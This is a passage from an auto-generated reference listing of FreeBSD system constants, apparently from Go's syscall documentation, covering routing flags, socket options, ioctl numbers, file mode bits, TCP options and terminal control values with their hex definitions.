1295) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1296) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1297) | RTF_MULTICAST = 0x800000 constant RTF_PINNED (line 1298) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 1299) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1300) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1301) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 1302) | RTF_REJECT = 0x8 constant RTF_RNH_LOCKED (line 1303) | RTF_RNH_LOCKED = 0x40000000 constant RTF_STATIC (line 1304) | RTF_STATIC = 0x800 constant RTF_STICKY (line 1305) | RTF_STICKY = 0x10000000 constant RTF_UP (line 1306) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1307) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1308) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1309) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1310) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1311) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1312) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1313) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1314) | RTM_IEEE80211 = 0x12 constant RTM_IFANNOUNCE (line 1315) | RTM_IFANNOUNCE = 0x11 constant RTM_IFINFO (line 1316) | RTM_IFINFO = 0xe constant RTM_LOCK (line 1317) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1318) | RTM_LOSING = 0x5 constant RTM_MISS (line 1319) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1320) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1321) | RTM_NEWMADDR = 0xf constant RTM_REDIRECT (line 1322) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1323) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1324) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1325) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1326) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1327) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1328) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1329) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1330) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1331) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1332) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1333) | RTV_SSTHRESH = 0x20 constant RTV_WEIGHT (line 1334) | RTV_WEIGHT = 0x100 constant RT_ALL_FIBS (line 1335) | RT_ALL_FIBS = -0x1 constant RT_BLACKHOLE (line 1336) | RT_BLACKHOLE = 0x40 constant RT_DEFAULT_FIB (line 1337) | RT_DEFAULT_FIB = 0x0 constant RT_HAS_GW (line 1338) | RT_HAS_GW = 0x80 constant RT_HAS_HEADER (line 1339) | RT_HAS_HEADER = 0x10 constant RT_HAS_HEADER_BIT (line 1340) | RT_HAS_HEADER_BIT = 0x4 constant RT_L2_ME (line 1341) | RT_L2_ME = 0x4 constant RT_L2_ME_BIT (line 1342) | RT_L2_ME_BIT = 0x2 constant RT_LLE_CACHE (line 1343) | RT_LLE_CACHE = 0x100 constant RT_MAY_LOOP (line 1344) | RT_MAY_LOOP = 0x8 constant RT_MAY_LOOP_BIT (line 1345) | RT_MAY_LOOP_BIT = 0x3 constant RT_REJECT (line 1346) | RT_REJECT = 0x20 constant RUSAGE_CHILDREN (line 1347) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1348) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1349) | RUSAGE_THREAD = 0x1 constant SCM_BINTIME (line 1350) | SCM_BINTIME = 0x4 constant SCM_CREDS (line 1351) | SCM_CREDS = 0x3 constant SCM_MONOTONIC (line 1352) | SCM_MONOTONIC = 0x6 constant SCM_REALTIME (line 1353) | SCM_REALTIME = 0x5 constant SCM_RIGHTS (line 1354) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1355) | SCM_TIMESTAMP = 0x2 constant SCM_TIME_INFO (line 1356) | SCM_TIME_INFO = 0x7 constant SEEK_CUR (line 1357) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1358) | SEEK_DATA = 0x3 constant SEEK_END (line 1359) | SEEK_END = 0x2 constant SEEK_HOLE (line 1360) | SEEK_HOLE = 0x4 constant SEEK_SET (line 1361) | SEEK_SET = 0x0 constant SHUT_RD (line 1362) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1363) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1364) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1365) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1366) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1367) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1368) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1369) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1370) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1371) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPHYADDR (line 1372) | SIOCDIFPHYADDR = 0x80206949 constant SIOCGDRVSPEC (line 1373) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETSGCNT (line 1374) | SIOCGETSGCNT = 0xc0207210 constant SIOCGETVIFCNT (line 1375) | SIOCGETVIFCNT = 0xc028720f constant SIOCGHIWAT (line 1376) | SIOCGHIWAT = 0x40047301 constant SIOCGHWADDR (line 1377) | SIOCGHWADDR = 0xc020693e constant SIOCGI2C (line 1378) | SIOCGI2C = 0xc020693d constant SIOCGIFADDR (line 1379) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALIAS (line 1380) | SIOCGIFALIAS = 0xc044692d constant SIOCGIFBRDADDR (line 1381) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1382) | SIOCGIFCAP = 0xc020691f constant SIOCGIFCONF (line 1383) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDESCR (line 1384) | SIOCGIFDESCR = 0xc020692a constant SIOCGIFDOWNREASON (line 1385) | SIOCGIFDOWNREASON = 0xc058699a constant SIOCGIFDSTADDR (line 1386) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFIB (line 1387) | SIOCGIFFIB = 0xc020695c constant SIOCGIFFLAGS (line 1388) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGENERIC (line 1389) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGMEMB (line 1390) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1391) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFINDEX (line 1392) | SIOCGIFINDEX = 0xc0206920 constant SIOCGIFMAC (line 1393) | SIOCGIFMAC = 0xc0206926 constant SIOCGIFMEDIA (line 1394) | SIOCGIFMEDIA = 0xc0306938 constant SIOCGIFMETRIC (line 1395) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1396) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1397) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1398) | SIOCGIFPDSTADDR = 0xc0206948 constant SIOCGIFPHYS (line 1399) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1400) | SIOCGIFPSRCADDR = 0xc0206947 constant SIOCGIFRSSHASH (line 1401) | SIOCGIFRSSHASH = 0xc0186997 constant SIOCGIFRSSKEY (line 1402) | SIOCGIFRSSKEY = 0xc0946996 constant SIOCGIFSTATUS (line 1403) | SIOCGIFSTATUS = 0xc331693b constant SIOCGIFXMEDIA (line 1404) | SIOCGIFXMEDIA = 0xc030698b constant SIOCGLANPCP (line 1405) | SIOCGLANPCP = 0xc0206998 constant SIOCGLOWAT (line 1406) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1407) | SIOCGPGRP = 0x40047309 constant SIOCGPRIVATE_0 (line 1408) | SIOCGPRIVATE_0 = 0xc0206950 constant SIOCGPRIVATE_1 (line 1409) | SIOCGPRIVATE_1 = 0xc0206951 constant SIOCGTUNFIB (line 1410) | SIOCGTUNFIB = 0xc020695e constant SIOCIFCREATE (line 1411) | SIOCIFCREATE = 0xc020697a constant SIOCIFCREATE2 (line 1412) | SIOCIFCREATE2 = 0xc020697c constant SIOCIFDESTROY (line 1413) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1414) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSDRVSPEC (line 1415) | SIOCSDRVSPEC = 0x8028697b constant SIOCSHIWAT (line 1416) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1417) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1418) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1419) | SIOCSIFCAP = 0x8020691e constant SIOCSIFDESCR (line 1420) | SIOCSIFDESCR = 0x80206929 constant SIOCSIFDSTADDR (line 1421) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFIB (line 1422) | SIOCSIFFIB = 0x8020695d constant SIOCSIFFLAGS (line 1423) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1424) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1425) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1426) | SIOCSIFMAC = 0x80206927 constant SIOCSIFMEDIA (line 1427) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1428) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1429) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNAME (line 1430) | SIOCSIFNAME = 0x80206928 constant SIOCSIFNETMASK (line 1431) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1432) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSIFPHYS (line 1433) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFRVNET (line 1434) | SIOCSIFRVNET = 0xc020695b constant SIOCSIFVNET (line 1435) | SIOCSIFVNET = 0xc020695a constant SIOCSLANPCP (line 1436) | SIOCSLANPCP = 0x80206999 constant SIOCSLOWAT (line 1437) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1438) | SIOCSPGRP = 0x80047308 constant SIOCSTUNFIB (line 1439) | SIOCSTUNFIB = 0x8020695f constant SOCK_CLOEXEC (line 1440) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1441) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1442) | SOCK_MAXADDRLEN = 0xff constant SOCK_NONBLOCK (line 1443) | SOCK_NONBLOCK = 0x20000000 constant SOCK_RAW (line 1444) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1445) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1446) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1447) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1448) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1449) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1450) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1451) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1452) | SO_ACCEPTFILTER = 0x1000 constant SO_BINTIME (line 1453) | SO_BINTIME = 0x2000 constant SO_BROADCAST (line 1454) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1455) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1456) | SO_DOMAIN = 0x1019 constant SO_DONTROUTE (line 1457) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1458) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1459) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1460) | SO_LABEL = 0x1009 constant SO_LINGER (line 1461) | SO_LINGER = 0x80 constant SO_LISTENINCQLEN (line 1462) | SO_LISTENINCQLEN = 0x1013 constant SO_LISTENQLEN (line 1463) | SO_LISTENQLEN = 0x1012 constant SO_LISTENQLIMIT (line 1464) | SO_LISTENQLIMIT = 0x1011 constant SO_MAX_PACING_RATE (line 1465) | SO_MAX_PACING_RATE = 0x1018 constant SO_NOSIGPIPE (line 1466) | SO_NOSIGPIPE = 0x800 constant SO_NO_DDP (line 1467) | SO_NO_DDP = 0x8000 constant SO_NO_OFFLOAD (line 1468) | SO_NO_OFFLOAD = 0x4000 constant SO_OOBINLINE (line 1469) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1470) | SO_PEERLABEL = 0x1010 constant SO_PROTOCOL (line 1471) | SO_PROTOCOL = 0x1016 constant SO_PROTOTYPE (line 1472) | SO_PROTOTYPE = 0x1016 constant SO_RCVBUF (line 1473) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1474) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1475) | SO_RCVTIMEO = 0x1006 constant SO_RERROR (line 1476) | SO_RERROR = 0x20000 constant SO_REUSEADDR (line 1477) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1478) | SO_REUSEPORT = 0x200 constant SO_REUSEPORT_LB (line 1479) | SO_REUSEPORT_LB = 0x10000 constant SO_SETFIB (line 1480) | SO_SETFIB = 0x1014 constant SO_SNDBUF (line 1481) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1482) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1483) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1484) | SO_TIMESTAMP = 0x400 constant SO_TS_BINTIME (line 1485) | SO_TS_BINTIME = 0x1 constant SO_TS_CLOCK (line 1486) | SO_TS_CLOCK = 0x1017 constant SO_TS_CLOCK_MAX (line 1487) | SO_TS_CLOCK_MAX = 0x3 constant SO_TS_DEFAULT (line 1488) | SO_TS_DEFAULT = 0x0 constant SO_TS_MONOTONIC (line 1489) | SO_TS_MONOTONIC = 0x3 constant SO_TS_REALTIME (line 1490) | SO_TS_REALTIME = 0x2 constant SO_TS_REALTIME_MICRO (line 1491) | SO_TS_REALTIME_MICRO = 0x0 constant SO_TYPE (line 1492) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1493) | SO_USELOOPBACK = 0x40 constant SO_USER_COOKIE (line 1494) | SO_USER_COOKIE = 0x1015 constant SO_VENDOR (line 1495) | SO_VENDOR = 0x80000000 constant S_BLKSIZE (line 1496) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1497) | S_IEXEC = 0x40 constant S_IFBLK (line 1498) | S_IFBLK = 0x6000 constant S_IFCHR (line 1499) | S_IFCHR = 0x2000 constant S_IFDIR (line 1500) | S_IFDIR = 0x4000 constant S_IFIFO (line 1501) | S_IFIFO = 0x1000 constant S_IFLNK (line 1502) | S_IFLNK = 0xa000 constant S_IFMT (line 1503) | S_IFMT = 0xf000 constant S_IFREG (line 1504) | S_IFREG = 0x8000 constant S_IFSOCK (line 1505) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1506) | S_IFWHT = 0xe000 constant S_IREAD (line 1507) | S_IREAD = 0x100 constant S_IRGRP (line 1508) | S_IRGRP = 0x20 constant S_IROTH (line 1509) | S_IROTH = 0x4 constant S_IRUSR (line 1510) | S_IRUSR = 0x100 constant S_IRWXG (line 1511) | S_IRWXG = 0x38 constant S_IRWXO (line 1512) | S_IRWXO = 0x7 constant S_IRWXU (line 1513) | S_IRWXU = 0x1c0 constant S_ISGID (line 1514) | S_ISGID = 0x400 constant S_ISTXT (line 1515) | S_ISTXT = 0x200 constant S_ISUID (line 1516) | S_ISUID = 0x800 constant S_ISVTX (line 1517) | S_ISVTX = 0x200 constant S_IWGRP (line 1518) | S_IWGRP = 0x10 constant S_IWOTH (line 1519) | S_IWOTH = 0x2 constant S_IWRITE (line 1520) | S_IWRITE = 0x80 constant S_IWUSR (line 1521) | S_IWUSR = 0x80 constant S_IXGRP (line 1522) | S_IXGRP = 0x8 constant S_IXOTH (line 1523) | S_IXOTH = 0x1 constant S_IXUSR (line 1524) | S_IXUSR = 0x40 constant TAB0 (line 1525) | TAB0 = 0x0 constant TAB3 (line 1526) | TAB3 = 0x4 constant TABDLY (line 1527) | TABDLY = 0x4 constant TCIFLUSH (line 1528) | TCIFLUSH = 0x1 constant TCIOFF (line 1529) | TCIOFF = 0x3 constant TCIOFLUSH (line 1530) | TCIOFLUSH = 0x3 constant TCION (line 1531) | TCION = 0x4 constant TCOFLUSH (line 1532) | TCOFLUSH = 0x2 constant TCOOFF (line 1533) | TCOOFF = 0x1 constant TCOON (line 1534) | TCOON = 0x2 constant TCPOPT_EOL (line 1535) | TCPOPT_EOL = 0x0 constant TCPOPT_FAST_OPEN (line 1536) | TCPOPT_FAST_OPEN = 0x22 constant TCPOPT_MAXSEG (line 1537) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1538) | TCPOPT_NOP = 0x1 constant TCPOPT_PAD (line 1539) | TCPOPT_PAD = 0x0 constant TCPOPT_SACK (line 1540) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_PERMITTED (line 1541) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SIGNATURE (line 1542) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1543) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_WINDOW (line 1544) | TCPOPT_WINDOW = 0x3 constant TCP_BBR_ACK_COMP_ALG (line 1545) | TCP_BBR_ACK_COMP_ALG = 0x448 constant TCP_BBR_ALGORITHM (line 1546) | TCP_BBR_ALGORITHM = 0x43b constant TCP_BBR_DRAIN_INC_EXTRA (line 1547) | TCP_BBR_DRAIN_INC_EXTRA = 0x43c constant TCP_BBR_DRAIN_PG (line 1548) | TCP_BBR_DRAIN_PG = 0x42e constant TCP_BBR_EXTRA_GAIN (line 1549) | TCP_BBR_EXTRA_GAIN = 0x449 constant TCP_BBR_EXTRA_STATE (line 1550) | TCP_BBR_EXTRA_STATE = 0x453 constant TCP_BBR_FLOOR_MIN_TSO (line 1551) | TCP_BBR_FLOOR_MIN_TSO = 0x454 constant TCP_BBR_HDWR_PACE (line 1552) | TCP_BBR_HDWR_PACE = 0x451 constant TCP_BBR_HOLD_TARGET (line 1553) | TCP_BBR_HOLD_TARGET = 0x436 constant TCP_BBR_IWINTSO (line 1554) | TCP_BBR_IWINTSO = 0x42b constant TCP_BBR_LOWGAIN_FD (line 1555) | TCP_BBR_LOWGAIN_FD = 0x436 constant TCP_BBR_LOWGAIN_HALF (line 1556) | TCP_BBR_LOWGAIN_HALF = 0x435 constant TCP_BBR_LOWGAIN_THRESH (line 1557) | TCP_BBR_LOWGAIN_THRESH = 0x434 constant TCP_BBR_MAX_RTO (line 1558) | TCP_BBR_MAX_RTO = 0x439 constant TCP_BBR_MIN_RTO (line 1559) | TCP_BBR_MIN_RTO = 0x438 constant TCP_BBR_MIN_TOPACEOUT (line 1560) | TCP_BBR_MIN_TOPACEOUT = 0x455 constant TCP_BBR_ONE_RETRAN (line 1561) | TCP_BBR_ONE_RETRAN = 0x431 constant TCP_BBR_PACE_CROSS (line 1562) | TCP_BBR_PACE_CROSS = 0x442 constant TCP_BBR_PACE_DEL_TAR (line 1563) | TCP_BBR_PACE_DEL_TAR = 0x43f constant TCP_BBR_PACE_OH (line 1564) | TCP_BBR_PACE_OH = 0x435 constant TCP_BBR_PACE_PER_SEC (line 1565) | TCP_BBR_PACE_PER_SEC = 0x43e constant TCP_BBR_PACE_SEG_MAX (line 1566) | TCP_BBR_PACE_SEG_MAX = 0x440 constant TCP_BBR_PACE_SEG_MIN (line 1567) | TCP_BBR_PACE_SEG_MIN = 0x441 constant TCP_BBR_POLICER_DETECT (line 1568) | TCP_BBR_POLICER_DETECT = 0x457 constant TCP_BBR_PROBE_RTT_GAIN (line 1569) | TCP_BBR_PROBE_RTT_GAIN = 0x44d constant TCP_BBR_PROBE_RTT_INT (line 1570) | TCP_BBR_PROBE_RTT_INT = 0x430 constant TCP_BBR_PROBE_RTT_LEN (line 1571) | TCP_BBR_PROBE_RTT_LEN = 0x44e constant TCP_BBR_RACK_RTT_USE (line 1572) | TCP_BBR_RACK_RTT_USE = 0x44a constant TCP_BBR_RECFORCE (line 1573) | TCP_BBR_RECFORCE = 0x42c constant TCP_BBR_REC_OVER_HPTS (line 1574) | TCP_BBR_REC_OVER_HPTS = 0x43a constant TCP_BBR_RETRAN_WTSO (line 1575) | TCP_BBR_RETRAN_WTSO = 0x44b constant TCP_BBR_RWND_IS_APP (line 1576) | TCP_BBR_RWND_IS_APP = 0x42f constant TCP_BBR_SEND_IWND_IN_TSO (line 1577) | TCP_BBR_SEND_IWND_IN_TSO = 0x44f constant TCP_BBR_STARTUP_EXIT_EPOCH (line 1578) | TCP_BBR_STARTUP_EXIT_EPOCH = 0x43d constant TCP_BBR_STARTUP_LOSS_EXIT (line 1579) | TCP_BBR_STARTUP_LOSS_EXIT = 0x432 constant TCP_BBR_STARTUP_PG (line 1580) | TCP_BBR_STARTUP_PG = 0x42d constant TCP_BBR_TMR_PACE_OH (line 1581) | TCP_BBR_TMR_PACE_OH = 0x448 constant TCP_BBR_TSLIMITS (line 1582) | TCP_BBR_TSLIMITS = 0x434 constant TCP_BBR_TSTMP_RAISES (line 1583) | TCP_BBR_TSTMP_RAISES = 0x456 constant TCP_BBR_UNLIMITED (line 1584) | TCP_BBR_UNLIMITED = 0x43b constant TCP_BBR_USEDEL_RATE (line 1585) | TCP_BBR_USEDEL_RATE = 0x437 constant TCP_BBR_USE_LOWGAIN (line 1586) | TCP_BBR_USE_LOWGAIN = 0x433 constant TCP_BBR_USE_RACK_CHEAT (line 1587) | TCP_BBR_USE_RACK_CHEAT = 0x450 constant TCP_BBR_UTTER_MAX_TSO (line 1588) | TCP_BBR_UTTER_MAX_TSO = 0x452 constant TCP_CA_NAME_MAX (line 1589) | TCP_CA_NAME_MAX = 0x10 constant TCP_CCALGOOPT (line 1590) | TCP_CCALGOOPT = 0x41 constant TCP_CONGESTION (line 1591) | TCP_CONGESTION = 0x40 constant TCP_DATA_AFTER_CLOSE (line 1592) | TCP_DATA_AFTER_CLOSE = 0x44c constant TCP_DELACK (line 1593) | TCP_DELACK = 0x48 constant TCP_FASTOPEN (line 1594) | TCP_FASTOPEN = 0x401 constant TCP_FASTOPEN_MAX_COOKIE_LEN (line 1595) | TCP_FASTOPEN_MAX_COOKIE_LEN = 0x10 constant TCP_FASTOPEN_MIN_COOKIE_LEN (line 1596) | TCP_FASTOPEN_MIN_COOKIE_LEN = 0x4 constant TCP_FASTOPEN_PSK_LEN (line 1597) | TCP_FASTOPEN_PSK_LEN = 0x10 constant TCP_FUNCTION_BLK (line 1598) | TCP_FUNCTION_BLK = 0x2000 constant TCP_FUNCTION_NAME_LEN_MAX (line 1599) | TCP_FUNCTION_NAME_LEN_MAX = 0x20 constant TCP_INFO (line 1600) | TCP_INFO = 0x20 constant TCP_KEEPCNT (line 1601) | TCP_KEEPCNT = 0x400 constant TCP_KEEPIDLE (line 1602) | TCP_KEEPIDLE = 0x100 constant TCP_KEEPINIT (line 1603) | TCP_KEEPINIT = 0x80 constant TCP_KEEPINTVL (line 1604) | TCP_KEEPINTVL = 0x200 constant TCP_LOG (line 1605) | TCP_LOG = 0x22 constant TCP_LOGBUF (line 1606) | TCP_LOGBUF = 0x23 constant TCP_LOGDUMP (line 1607) | TCP_LOGDUMP = 0x25 constant TCP_LOGDUMPID (line 1608) | TCP_LOGDUMPID = 0x26 constant TCP_LOGID (line 1609) | TCP_LOGID = 0x24 constant TCP_LOG_ID_LEN (line 1610) | TCP_LOG_ID_LEN = 0x40 constant TCP_MAXBURST (line 1611) | TCP_MAXBURST = 0x4 constant TCP_MAXHLEN (line 1612) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1613) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1614) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1615) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1616) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1617) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1618) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1619) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1620) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1621) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1622) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1623) | TCP_NOPUSH = 0x4 constant TCP_PCAP_IN (line 1624) | TCP_PCAP_IN = 0x1000 constant TCP_PCAP_OUT (line 1625) | TCP_PCAP_OUT = 0x800 constant TCP_RACK_EARLY_RECOV (line 1626) | TCP_RACK_EARLY_RECOV = 0x423 constant TCP_RACK_EARLY_SEG (line 1627) | TCP_RACK_EARLY_SEG = 0x424 constant TCP_RACK_GP_INCREASE (line 1628) | TCP_RACK_GP_INCREASE = 0x446 constant TCP_RACK_IDLE_REDUCE_HIGH (line 1629) | TCP_RACK_IDLE_REDUCE_HIGH = 0x444 constant TCP_RACK_MIN_PACE (line 1630) | TCP_RACK_MIN_PACE = 0x445 constant TCP_RACK_MIN_PACE_SEG (line 1631) | TCP_RACK_MIN_PACE_SEG = 0x446 constant TCP_RACK_MIN_TO (line 1632) | TCP_RACK_MIN_TO = 0x422 constant TCP_RACK_PACE_ALWAYS (line 1633) | TCP_RACK_PACE_ALWAYS = 0x41f constant TCP_RACK_PACE_MAX_SEG (line 1634) | TCP_RACK_PACE_MAX_SEG = 0x41e constant TCP_RACK_PACE_REDUCE (line 1635) | TCP_RACK_PACE_REDUCE = 0x41d constant TCP_RACK_PKT_DELAY (line 1636) | TCP_RACK_PKT_DELAY = 0x428 constant TCP_RACK_PROP (line 1637) | TCP_RACK_PROP = 0x41b constant TCP_RACK_PROP_RATE (line 1638) | TCP_RACK_PROP_RATE = 0x420 constant TCP_RACK_PRR_SENDALOT (line 1639) | TCP_RACK_PRR_SENDALOT = 0x421 constant TCP_RACK_REORD_FADE (line 1640) | TCP_RACK_REORD_FADE = 0x426 constant TCP_RACK_REORD_THRESH (line 1641) | TCP_RACK_REORD_THRESH = 0x425 constant TCP_RACK_TLP_INC_VAR (line 1642) | TCP_RACK_TLP_INC_VAR = 0x429 constant TCP_RACK_TLP_REDUCE (line 1643) | TCP_RACK_TLP_REDUCE = 0x41c constant TCP_RACK_TLP_THRESH (line 1644) | TCP_RACK_TLP_THRESH = 0x427 constant TCP_RACK_TLP_USE (line 1645) | TCP_RACK_TLP_USE = 0x447 constant TCP_VENDOR (line 1646) | TCP_VENDOR = 0x80000000 constant TCSAFLUSH (line 1647) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1648) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1649) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1650) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1651) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1652) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1653) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1654) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1655) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1656) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1657) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1658) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1659) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1660) | TIOCGPGRP = 0x40047477 constant TIOCGPTN (line 1661) | TIOCGPTN = 0x4004740f constant TIOCGSID (line 1662) | TIOCGSID = 0x40047463 constant TIOCGWINSZ (line 1663) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1664) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1665) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1666) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1667) | TIOCMGET = 0x4004746a constant TIOCMSDTRWAIT (line 1668) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1669) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1670) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1671) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1672) | TIOCM_CTS = 0x20 constant TIOCM_DCD (line 1673) | TIOCM_DCD = 0x40 constant TIOCM_DSR (line 1674) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1675) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1676) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1677) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1678) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1679) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1680) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1681) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1682) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1683) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1684) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1685) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1686) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1687) | 